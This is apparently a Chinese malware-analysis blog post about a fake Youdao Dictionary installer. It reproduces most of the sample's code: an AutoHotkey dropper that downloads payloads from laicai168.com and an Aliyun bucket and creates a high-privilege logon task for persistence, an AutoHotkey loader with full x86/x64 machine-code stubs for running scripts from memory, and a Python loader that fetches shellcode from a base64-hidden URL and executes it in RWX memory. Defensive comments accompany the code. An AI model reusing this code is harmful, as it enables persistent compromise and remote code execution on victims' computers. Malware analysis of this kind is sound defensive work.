有道字典

DeeLMind大约 3 分钟

有道字典

收集样本

  1. 下载样本youdaoFY.zip
https://www.google.com/search?q=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&newwindow=1&sca_esv=0ba29d23b081b3ca&sxsrf=ADLYWIL6zek9eGep9uTAH9WstdLJ4jt6mg%3A1717587588916&source=hp&ei=hE5gZuTkJpfe4-EPhKCJ2QM&iflsig=AL9hbdgAAAAAZmBclI18C9W_bFiwm22QJFOW9QeIbas-&ved=0ahUKEwjktt2wsMSGAxUX7zgGHQRQIjsQ4dUDCBc&uact=5&oq=%E6%9C%89%E9%81%93%E5%AD%97%E5%85%B8&gs_lp=Egdnd3Mtd2l6IgzmnInpgZPlrZflhbgyDRAAGIAEGLEDGIMBGAoyDRAAGIAEGLEDGIMBGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGAoyBxAAGIAEGApIi2JQAFjfTXAEeACQAQCYAZICoAH5GqoBBjAuMjIuMbgBA8gBAPgBAZgCF6AC9xfCAgQQIxgnwgIREC4YgAQYsQMY0QMYgwEYxwHCAgsQABiABBixAxiDAcICDhAuGIAEGLEDGIMBGIoFwgIIEAAYgAQYsQPCAgsQLhiABBixAxiDAcICChAjGIAEGCcYigXCAgUQABiABMICCxAuGIAEGMcBGK8BwgIJEAAYgAQYChgMwgIIEAAYgAQYogTCAgYQABgEGB7CAgYQABgeGA_CAgYQABgIGB7CAgQQABgewgIKEC4YChgqGAwYHsICCBAAGAoYDBgewgIGEAAYDRgewgIIEAAYDRgeGA_CAggQABgEGA0YHsICCBAAGAQYHhgPwgIIEAAYBBgIGB7CAggQABgIGA0YHsICDBAAGAQYCBgNGB4YD8ICChAAGAQYDRgeGA_CAgoQABgEGAgYHhgPwgIKEAAYBBgHGB4YD8ICBhAAGAcYHsICCBAAGAcYHhgPmAMAkgcGMy4xOC4yoAeOZA&sclient=gws-wiz#ip=1

er

er

简单分析

  1. 运行病毒文件

er

#NoTrayIcon 
#NoEnv 
#NoTrayIcon
#SingleInstance off
; Stage-1 dropper (AutoHotkey v1). Everything below runs inside a single
; try block with no catch, so any failing command is swallowed silently
; rather than surfacing to the victim.
   try
   {
; Elevated cmd chain (*RunAs raises a UAC prompt): (1) start the decoy
; installer YoudaoDictSetup.exe so the victim sees a plausible setup;
; (2) register a logon scheduled task named "AHK" with /rl highest that
; runs AutoHotkey.exe from C:\Users\Public\Music\Update\ -- the persistence
; mechanism; (3) delete the current AutoHotkey.ahk and Run8.txt to remove
; traces. Detection: schtasks /create ... /tn AHK /rl highest under a
; cmd/AutoHotkey parent, and an interpreter living under Public\Music.
Run, *RunAs %comspec% /c start C:\ProgramData\AutoHotkey\YoudaoDictSetup.exe&schtasks /create /sc onlogon /tn AHK /rl highest /tr "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.exe" /F&del C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk&del C:\Users\Public\AutoHotkey\Run8.txt , , Hide
; Three downloads, all written under C:\Users\Public\Music\:
;   py.zip  from an Aliyun OSS bucket -- the final RunWait launches
;           pythonw.exe from the extracted folder, so this is a portable
;           Python runtime;
;   qd.jpg  from laicai168.com -- not an image: pythonw.exe runs it below,
;           and the page lists its contents (the shellcode loader) later;
;   qd.ahk  from laicai168.com -- saved as AutoHotkey.ahk, i.e. the script
;           the scheduled task above executes at every logon.
url := "https://sogou88.oss-cn-beijing.aliyuncs.com/py.zip"
localFile := "C:\Users\Public\Music\python\py.zip"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.jpg"
localFile := "C:\Users\Public\Music\python\qd.jpg"
UrlDownloadToFile, %url%, %localFile%
url := "http://laicai168.com/qd.ahk"
localFile := "C:\Users\Public\Music\Update\AutoHotkey\AutoHotkey.ahk"
UrlDownloadToFile, %url%, %localFile%
; Unpack the runtime with PowerShell Expand-Archive in a hidden window.
RunWait, %comspec% /c powershell.exe -Command Expand-Archive -Path C:\Users\Public\Music\python\Py.zip -DestinationPath C:\Users\Public\Music\python , , Hide
; Append 1-10 random alphanumeric characters (digits, A-Z, a-z; the two
; ASCII gaps are skipped) to qd.jpg so each victim's copy has a different
; file hash. The Python file shown later on this page ends in a bare "# "
; line, presumably so the appended text lands inside a comment. "Lenght"
; is the author's spelling.
randomString := ""
Lenght := rand(1,10) 
Loop, %Lenght%
{
    Random, char, 48, 122 
    If (char > 57 && char < 65) || (char > 90 && char < 97) 
        Continue
    randomString .= Chr(char) 
}
FileAppend, %randomString%, C:\Users\Public\Music\python\qd.jpg

; Inclusive random integer in [min, max]; only used for the loop length above.
rand(min, max) {
    Random, rand, min, max
    return rand
}
; Run the loader with pythonw.exe (no console window) and delete the runtime
; archive. Detection: pythonw.exe whose script argument ends in .jpg.
RunWait, %comspec% /c start C:\Users\Public\Music\python\pythonw.exe C:\Users\Public\Music\python\qd.jpg&del C:\Users\Public\Music\python\py.zip , , Hide
   }
; tUKF5GQ19
  1. http://laicai168.com/qd.ahk

;You can compile and set icons by using Ahk2Exe.exe

;If AutoHotkey.exe wants to change its name to abc.exe, Please modify Ahk=%A_ScriptDir%\abc.exe

; Stage-2 script (downloaded as qd.ahk, saved as AutoHotkey.ahk and run by
; the "AHK" logon task). It is a generic "run an AutoHotkey script from
; memory" wrapper: the real script is carried as the encoded string s below
; and handed to Exec(), which apparently feeds it to a new AutoHotkey.exe
; through a named pipe, so the decoded script is never written to disk.
 #NoEnv
 #NoTrayIcon
 #SingleInstance off
 SetBatchLines, -1
 if A_IsCompiled
 {
; When built with Ahk2Exe, a bundled AutoHotkey.exe is extracted next to the
; compiled binary and used as the interpreter.
   Ahk=%A_ScriptDir%\AutoHotkey.exe
   FileInstall, AutoHotkey.exe, %Ahk%
 }
 else Ahk=

; Encoded payload script: a run of "u<decimal>" fields, each decoded by
; Exec() into one 32-bit word of the script bytes. Only the first and last
; fragments are reproduced on this page; "..." marks the author's elision.
s=
s.="u3615544364u640425871u1678942631u2998343137u1434168171u24144"
...
s.="313546u1039906973u484215839u3522253212"

 Exec(s, Ahk)
 ExitApp

Exec(str, Ahk="", arg="") {
  ; Run the packed script in *str* under a fresh AutoHotkey.exe process.
  ; Returns 1 after launching, 0 if no interpreter binary is found.
  ; Statics: MyFunc holds the native stub, base the kernel32 module handle;
  ; ScriptName is seeded from %True% (reads as the variable named "1", i.e.
  ; the first command-line argument -- confirm) and falls back to
  ; A_ScriptFullPath further down.
  static MyFunc, base, ScriptName:=%True%
  ; Decode: strip whitespace, count the "u" separators into size (= number
  ; of 32-bit words), then reuse *str* as a byte buffer and NumPut each
  ; decimal field as a uint. Afterwards &str and size describe the raw
  ; script bytes handed to the stub.
  s:=RegExReplace(str,"\s"), StrReplace(s,"u","",size)
  VarSetCapacity(str,(size+1)*4,0), s:=SubStr(s,InStr(s,"u")+1)
  Loop, Parse, s, u
    NumPut(A_LoopField, str, (A_Index-1)*4, "uint")
  ;-----------------------------
  ; Locate the interpreter: explicit Ahk, else AutoHotkey.exe beside a
  ; compiled binary, else the path of the interpreter running this script.
  Ahk:=Ahk ? Ahk : A_IsCompiled
    ? A_ScriptDir "\AutoHotkey.exe" : A_AhkPath
  IfNotExist, %Ahk%
  {
    MsgBox, 4096, Error!, `n`nCan't Find: %Ahk% !`n`n
    return, 0
  }
  ; One-time setup of the native stub (first call only).
  if !MyFunc
  {
    ; x86 and x64 machine-code blobs, hex-encoded. Readable immediates in
    ; them spell GetProcA(ddress), WriteFile, GlobalAlloc, GlobalFree,
    ; CreateProcessA, CreateNamedPipeA, ConnectNamedPipe and CloseHandle, so
    ; the stub appears to resolve those from the kernel32 base it is given,
    ; create the pipe, start AutoHotkey.exe with the pipe as its script path
    ; and write the decoded script into the pipe.
    x32:="5557565381EC4C0100008B9C24680100008BBC246C01000"
    . "08BAC24700100008B433C01D88038500F85380500008078014"
    . "50F852E0500008B706085F60F84FF04000031C9837864010F9"
    . "2C119D283E210894C245083C2788B341001DE8B4E188974243"
    . "C8B562085C90F84E504000031C08D3413EB0B83C00139C10F8"
    . "4D30400008B1486813C134765745075E9817C1304726F63417"
    . "5DF8B74243C8D04430346240FB7008D048303461C8B3085F60"
    . "F84A0040000B86500000001DE891C2466894424688D442460C"
    . "744246057726974C74424646546696C89442404FFD683EC088"
    . "944243C8D442475891C24C7442475476C6F62C7442479616C4"
    . "16CC744247D6C6F630089442404FFD683EC08BA65650000894"
    . "424548D44246A6689542472891C24C744246A476C6F62C7442"
    . "46E616C4672C64424740089442404FFD683EC08B9734100008"
    . "94424488D84248D00000066898C2499000000891C24C784248"
    . "D00000043726561C784249100000074655072C784249500000"
    . "06F636573C684249B0000000089442404FFD683EC088944245"
    . "C8D8424BE000000891C24C78424BE00000043726561C78424C"
    . "200000074654E61C78424C60000006D656450C78424CA00000"
    . "069706541C68424CE0000000089442404FFD683EC088944245"
    . "88D8424CF000000891C24C78424CF000000436F6E6EC78424D"
    . "30000006563744EC78424D7000000616D6564C78424DB00000"
    . "050697065C68424DF0000000089442404FFD683EC088944244"
    . "08D842481000000891C24C7842481000000436C6F73C784248"
    . "50000006548616EC7842489000000646C650089442404FFD68"
    . "3EC088D5C24608944244CC744241000000000C744240800000"
    . "000897C2404895C240CC7042400000000FF54243C83EC14807"
    . "C2460000F85E50200008D34AD04000000C7042400000000897"
    . "4244489742404FF54245483EC0885C089C30F841703000031C"
    . "085ED7415908B148789148383C00139C575F38B44244483E80"
    . "4C7040300000000C784249C0000000B000000BA0B000000C78"
    . "424A00000000D000000C78424A40000001100000031C0C7842"
    . "4A800000013000000EB0C89C283E2038B94949C00000069D28"
    . "300000089C183E10301C283C00183F86489948C9C00000075D"
    . "831D285ED742D669089D183E10369848C9C000000830000000"
    . "1D089848C9C000000330493D1C083C00189049383C20139D57"
    . "5D58B8424640100008B742458C744241C00000000C74424180"
    . "0000000C744241400000000C744241000000000C744240CFF0"
    . "00000C744240800000000C744240402000000890424FFD683E"
    . "C2089C78B842464010000C744241C00000000C744241800000"
    . "000C744241400000000C744241000000000C744240CFF00000"
    . "0C744240800000000C744240402000000890424FFD683EC208"
    . "3FFFF89C60F849D01000083F8FF0F84940100008D8C24E0000"
    . "0008D94244001000089C8C7000000000083C00439C275F3837"
    . "C245001894C2420C744241C00000000C744241800000000C74"
    . "4241400000000C744241000000000C744240C00000000C7442"
    . "4080000000019C0C704240000000083E0E483C060898424E00"
    . "000008D8424AC000000894424248B84246001000089442404F"
    . "F54245C83EC2885C00F84DA0000008B6C244C8B8424AC00000"
    . "089042489E8FFD083EC048B8424B000000089042489E8FFD08"
    . "3EC04893C24C744240400000000FF54244083EC0889E8893C2"
    . "4FFD083EC04893424C744240400000000FF54244083EC088D4"
    . "42460895C2404893424C7442410000000008944240C8B44244"
    . "489442408FF54243C83EC1489E8893424FFD083EC04891C24F"
    . "F54244883EC0431C081C44C0100005B5E5F5DC21400C744245"
    . "001000000BA88000000E904FBFFFFB8FEFFFFFF81C44C01000"
    . "05B5E5F5DC2140081C44C010000B8FFFFFFFF5B5E5F5DC2140"
    . "0B8FDFFFFFFEBDA893C248B7C244C89F8FFD083EC0489F8893"
    . "424FFD083EC04891C24FF542448B8FAFFFFFF83EC04EBB1893"
    . "C248B7C244C89F8FFD083EC0489F8893424FFD083EC04891C2"
    . "4FF542448B8FBFFFFFF83EC04EB88B8FCFFFFFFEB8190"
    x64:="4157415641554154555756534881EC98010000B8FFFFFFF"
    . "F8BB4240002000048899424E8010000418B503C4D89C748898"
    . "C24E00100004D89CC4C01C2803A500F858C040000807A01450"
    . "F8582040000448B42604585C00F8489040000837A64014819C"
    . "031FF83E0104883C078837A6401400F92C7897C245C448B0C0"
    . "2B8FEFFFFFF4D01F9418B4918418B512085C90F843D0400003"
    . "1C04D8D0417EB100F1F40004883C00139C10F864B040000418"
    . "B148041813C174765745075E641817C1704726F634175DB418"
    . "B5124498D04470FB71410418B411C498D14978B3C0285FF0F8"
    . "41304000048B8577269746546696C488D6C24704C01FF48894"
    . "42470B8650000004C89F94889EA6689442478FFD74989C548B"
    . "8476C6F62616C416C488D9424900000004C89F948898424900"
    . "00000C78424980000006C6F6300FFD7BA656500004889C348B"
    . "8476C6F62616C467266899424880000004C89F9488D9424800"
    . "000004889842480000000C684248A00000000FFD7B97341000"
    . "0488944245048B8437265617465507266898C24BC000000488"
    . "D9424B00000004C89F948898424B0000000C78424B80000006"
    . "F636573C68424BE00000000FFD7488944246048B8437265617"
    . "4654E61488D9424D000000048898424D000000048B86D65645"
    . "0697065414C89F948898424D8000000C68424E000000000FFD"
    . "74989C648B8436F6E6E6563744E488D9424F00000004889842"
    . "4F000000048B8616D6564506970654C89F948898424F800000"
    . "0C684240001000000FFD7488944246848B8436C6F736548616"
    . "E488D9424A00000004C89F948898424A0000000C78424A8000"
    . "000646C6500FFD74531C031C94889C748C7442420000000004"
    . "989E94C89E241FFD5807C247000B8FDFFFFFF0F85490200008"
    . "D14B50400000031C94989D7FFD34885C04889C30F849202000"
    . "031C085F6741D0F1F840000000000418B14848914834883C00"
    . "139C677F189F048C1E002C7040300000000C78424C00000000"
    . "B000000BA0B000000C78424C40000000D000000C78424C8000"
    . "0001100000031C0C78424CC00000013000000EB0C89C283E20"
    . "38B9494C000000069D28300000089C183E10301C283C00183F"
    . "86489948CC000000075D831D285F6742E904889D183E103698"
    . "48CC00000008300000001D089848CC0000000330493D1C083C"
    . "0018904934883C20139D677D34531C041B9FF000000BA02000"
    . "000488B8C24E801000048C744243800000000C744243000000"
    . "000C744242800000000C74424200000000041FFD64889C6453"
    . "1C048C744243800000000C744243000000000C744242800000"
    . "00041B9FF000000C744242000000000BA02000000488B8C24E"
    . "801000041FFD64883FEFF4989C40F84380100004883F8FF0F8"
    . "42E010000488D8C2430010000488D9424900100004889C8669"
    . "0C700000000004883C0044839C275F1837C245C0148894C244"
    . "048C74424380000000048C744243000000000C744242800000"
    . "000C744242000000000488B9424E001000019C04531C94531C"
    . "083E0E431C983C06089842430010000488D842410010000488"
    . "9442448488B442460FFD085C00F8488000000488B8C2410010"
    . "000FFD7488B8C2418010000FFD74C8B74246831D24889F14C8"
    . "9F0FFD04889F1FFD731D24C89E14C89F0FFD04989E94589F84"
    . "889DA4C89E148C74424200000000041FFD54C89E1FFD74889D"
    . "9488B442450FFD031C04881C4980100005B5E5F5D415C415D4"
    . "15E415FC3B888000000C744245C01000000E981FBFFFFB8FEF"
    . "FFFFFEBD34889F1FFD74C89E1FFD74889D9488B442450FFD0B"
    . "8FAFFFFFFEBB84889F1FFD74C89E1FFD74889D9488B442450F"
    . "FD0B8FBFFFFFFEB9DB8FCFFFFFFEB969090909090"
    ; Pick the blob for this process's bitness, write it byte by byte into
    ; MyFunc and mark that buffer PAGE_EXECUTE_READWRITE (0x40) so it can be
    ; invoked with DllCall(&MyFunc, ...). This is the same self-written RWX
    ; memory pattern as the Python loader later on this page, and the
    ; VirtualProtect transition is the event a detection should key on.
    hex:=A_PtrSize=8 ? x64:x32
    VarSetCapacity(MyFunc, len:=StrLen(hex)//2)
    Loop, % len
      NumPut("0x" SubStr(hex,2*A_Index-1,2),MyFunc,A_Index-1,"uchar")
    DllCall("VirtualProtect","ptr",&MyFunc,"ptr",len,"uint",0x40,"ptr*",0)
    base:=DllCall("GetModuleHandle", "Str","Kernel32", "ptr")
    ScriptName:=ScriptName ? ScriptName : A_ScriptFullPath
  }
  ; Per call: a random pipe name and a command line of the form
  ;   "<AutoHotkey.exe>" "\\.\pipe\AHK<tick><n>" "<ScriptName>" <arg>
  ; The stub receives that command line, the pipe name, the kernel32 base,
  ; and the decoded script bytes with their size. Detection: AutoHotkey.exe
  ; whose script argument is a \\.\pipe\AHK path -- the script it executes
  ; exists only in the pipe, never on disk.
  Random, n, 1, 1000000
  pipe_name:="\\.\pipe\AHK" . A_TickCount . n
  cmdline="%Ahk%" "%pipe_name%" "%ScriptName%" %arg%
  DllCall(&MyFunc, "AStr",cmdline, "AStr",pipe_name
  , "ptr",base, "ptr",&str, "uint",size)
  return, 1
}
;
  1. http://laicai168.com/qd.jpg
import subprocess
import requests
import ctypes
import ctypes.wintypes
import time
import base64

# Execute the command without showing a window

# Rest of your code...

# Rest of your code...

# ctypes prototype for calling a raw code buffer as a C function that takes
# no arguments and returns nothing; execute_shellcode() instantiates it with
# the address returned by VirtualAlloc and calls through it.
ShellcodeFunction = ctypes.CFUNCTYPE(None)

def download_binary_file(url: str, delay: int = 5) -> bytes | None:
    """Fetch *url* once and return the raw response body, or None.

    In this sample the body is the second-stage payload that main() hands
    to execute_shellcode(); no integrity check or decoding is applied to it.
    Only a transport-level failure (RequestException) triggers the
    ``delay``-second sleep; a non-200 response returns None immediately, so
    the caller's retry loop does not pause in that case.
    """
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            return response.content
    except requests.exceptions.RequestException:
        print(f'Failed to load {url}, retrying in {delay} seconds...')
        time.sleep(delay)
    return None

def execute_shellcode(shellcode: bytes | None) -> None:
    """Copy *shellcode* into freshly allocated memory, make it executable, call it.

    Analyst notes: this is the textbook in-process loader sequence
    (VirtualAlloc -> VirtualProtect to PAGE_EXECUTE_READWRITE -> memmove ->
    call through a CFUNCTYPE pointer -> VirtualFree). The call lands in
    private, non-image-backed memory, which is the API chain and call
    pattern that EDR/ETW-based detections key on. No API return value is
    checked. If the payload ever returns, the memory is released and main()
    downloads and runs it again.
    """
    if shellcode is None:
        print("No shellcode to execute.")
        return

    shellcode_size = len(shellcode)
    # Allocate executable memory
    # 0x3000 = MEM_COMMIT | MEM_RESERVE. The region is requested as plain
    # PAGE_READWRITE and only flipped to RWX below, so a rule that alerts
    # solely on RWX *allocations* would miss this; the VirtualProtect
    # transition is the event to watch.
    exec_memory = ctypes.windll.kernel32.VirtualAlloc(
        None, shellcode_size, 0x3000, 0x04)  # PAGE_READWRITE : 0x04
    # Change the allocated memory page protection to PAGE_EXECUTE_READWRITE
    old_protect = ctypes.wintypes.DWORD()
    ctypes.windll.kernel32.VirtualProtect(
        exec_memory, shellcode_size, 0x40, ctypes.byref(old_protect))  # PAGE_EXECUTE_READWRITE : 0x40
    # Copy the shellcode to the executable memory
    ctypes.memmove(exec_memory, shellcode, shellcode_size)
    # Create a function pointer to the shellcode
    shellcode_func = ShellcodeFunction(exec_memory)
    # Call the function
    shellcode_func()
    # Free the allocated memory
    # 0x8000 = MEM_RELEASE.
    ctypes.windll.kernel32.VirtualFree(exec_memory, 0, 0x8000)

def main() -> None:
    """Download the second-stage payload and run it, forever.

    ``encoded_url`` is plain base64, not encryption; it decodes to
    ``http://comc0m.com/laicai168.com.bin`` (note the laicai168.com string
    reused from the dropper's download host). The loop has no exit
    condition: a payload that returns, a failed download (None) and a
    non-200 response all lead straight to the next download, and because
    download_binary_file() sleeps only on a transport exception, an HTTP
    error response turns this into a tight polling loop against the host.
    """
    encoded_url = "aHR0cDovL2NvbWMwbS5jb20vbGFpY2FpMTY4LmNvbS5iaW4="
    url = base64.b64decode(encoded_url).decode()
    while True:
        shellcode = download_binary_file(url)
        execute_shellcode(shellcode)

if __name__ == "__main__":
    # Script entry point; main() loops forever, so this call never returns.
    main()

# 